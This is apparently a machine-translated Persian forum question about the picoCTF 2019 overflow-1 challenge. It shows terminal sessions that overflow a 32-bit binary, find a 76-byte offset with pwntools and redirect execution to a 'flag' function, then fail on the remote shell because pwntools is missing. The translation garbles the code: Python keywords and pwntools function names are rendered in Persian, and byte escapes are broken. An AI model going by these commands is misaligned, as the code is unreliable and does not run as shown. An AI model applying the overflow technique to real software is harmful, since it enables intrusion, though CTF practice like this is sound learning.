من چالش picoctf 2019 را انجام می دهم اما مشکلی پیش روی من است که روزها با آن روبرو هستم که هر وقت سعی می کنم از برنامه اصلی سوء استفاده کنم و می خواهم پرچم را بدست آورم ، پوسته از راه دور به من پیام می دهد که pwn نصب نشده است. اگرچه نصب شده است اما در پوسته از راه دور کار نمی کند.

 bilal @ Awaiss-iPhone: ~ / بارگیری $ python -c "print ('A' * 82)" | ./vuln
وای ، در حال پرش به 0x41414141 بودند!

bilal @ Awaiss-iPhone: ~ / بارگیری $ python3
>>> از واردات pwn *
>>> حلقوی (100)
aaaabaaacaaadaaaeaaafaaagaaahaaaaaajaaakaaalaaamaaanaaaaaaapaaaqaaaraaas

bilal @ Awaiss-iPhone: ~ / بارگیری $ ./vuln
به من رشته بدهید و بگذارید ببینم چه اتفاقی می افتد:
aaaabaaacaaadaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaapaaaqaaaraaasaaataaauaaavaaawaaaaaaaa
وای ، در حال پرش به 0x61616174 بودند!

bilal @ Awaiss-iPhone: ~ / بارگیری $ python3
>>> از واردات pwn *
>>> cyclic_find (p32 (0x61616174))

bilal @ Awaiss-iPhone: ~ / بارگیری $ python3 -c "print ('A' * 76 + 'B' * 6)" | ./vuln
وای ، در حال پرش به 0x42424242 بودند!

bilal @ Awaiss-iPhone: ~ / بارگیری $ python3
>>> vuln = ELF ('./ vuln')
[*] '/ خانه / بلال / بارگیری ها / ولن'
    قوس: i386-32-کمی
    RELRO: RELRO جزئی
    پشته: قناری یافت نشد
    NX: NX غیرفعال است
    PIE: بدون PIE (0x8048000)
    RWX: دارای بخش های RWX است

>>> p32 (vuln.symbols ['flag'])
   b ' xe6  x85  x04  x08'

برای سرریز آن

 bilal @ Awaiss-iPhone: ~ / بارگیری $ python3 -c "از واردات pwn *؛ چاپ ('A' * 76 + ' xe6  x85  x04  x08') "
| ./vuln
به من رشته بدهید و بگذارید ببینم چه اتفاقی می افتد:
وای ، در حال پرش به 0x85c2a6c3 بودند!

پوسته از راه دور

 redmailers @ pico-2019-shell1: / troubles / overflow-1_3_f08d494c74b95dae41bff71c2a6cf389 $ python3 -c
"از pwn import *؛ چاپ ('A' * 76 + ' xe6  x85  x04  x08')" | ./vuln
به من رشته بدهید و بگذارید ببینم چه اتفاقی می افتد:
پیگیری (آخرین تماس آخرین):
  پرونده "" ، خط 1 ، در 
ModuleNotFoundError: هیچ ماژولی به نام "pwn" وجود ندارد
وای ، در حال پرش به 0x8048705 بودند!